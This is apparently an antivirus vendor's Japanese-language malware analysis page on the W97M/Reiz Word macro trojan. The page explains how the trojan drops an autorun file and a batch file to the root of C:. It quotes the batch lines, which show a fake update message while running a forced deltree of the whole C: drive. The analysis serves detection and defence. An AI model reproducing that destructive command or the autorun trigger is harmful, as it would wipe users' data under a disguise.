製品情報
導入事例
サービス
サポート
ダウンロード
セキュリティ情報
 
- 最新ウイルス一覧
- ウイルス検索
- 駆除ツール
- Daily DATリリースに関するFAQ
- ウイルス絵とき理解
- ウイルス画像事典
- ウイルス解析依頼
- ウイルス用語集
- ウイルスの危険度格付け
- セキュリティ対策のヒント
パートナー
会社案内
個人のお客様
中堅・中小企業のお客様
企業のお客様
製品アップグレード
評価版
セミナー・イベント
キャンペーン
サポートQ&A
お問い合わせ
Global Sites:
Home → セキュリティ情報 → ウイルス情報:R
ウイルス情報
ウイルス情報

ウイルス名
W97M/Reiz
危険度
対応定義ファイル4030 (現在7507)
対応エンジン (現在5600) 
エンジンバージョンの見分け方
発見日(米国日付)99/06/04
概要ウイルスの特徴感染症状感染方法駆除方法

セキュリティ情報

最新ウイルス一覧へ >>
最新ウイルス
07/21Generic.tfr!...
07/21RDN/Generic ...
07/21Downloader.g...
定義ファイル・エンジンの
ダウンロード!
  定義ファイル:7507
 エンジン:5600
 
ウイルス検索
 




このトロイの木馬は、マクロモジュールが設定されたWord 97文書(AVERTに提出されたオリジナルファイルの名前は、ReizFakt.doc)であり、自己複製はしないので、ウイルスではない。コードは、ThisDocumentというモジュールから成り、文書が開かれたときに発動する。その後、C:\のルートディレクトリに次の2つのファイルを作成し、開かれた文書からその独自のコードを削除する(コメントのみを残す)。

C:\Autorun.inf

C:\Autoexek.bat このファイルには、次の行が含まれている。

@Echo Updating! This May Take A While...
@Echo Please Wait...
@deltree /y c:\ > c:\Reizfaktor.txt

作成される2つのファイルの組み合わせによって、次にWindows エクスプローラが再起動し(システムのリブート直後)、ユーザが「マイコンピュータ」またはWindowsエクスプローラのいずれかを介してC:\アイコンをアクティブ化したときに、C:\Autoexek.bat内のバッチコマンドが自動的に実行される。

そして、次のDOSボックスが表示される。

Updating! This May Take A While...Please Wait...

しかし一方では、削除処理の画面表示がC:\Reizfaktor.txtに転送される。

プログラム"DELTREE.EXE"は、Windows NT 4.0のデフォルトインストールにおいてはインストールされない。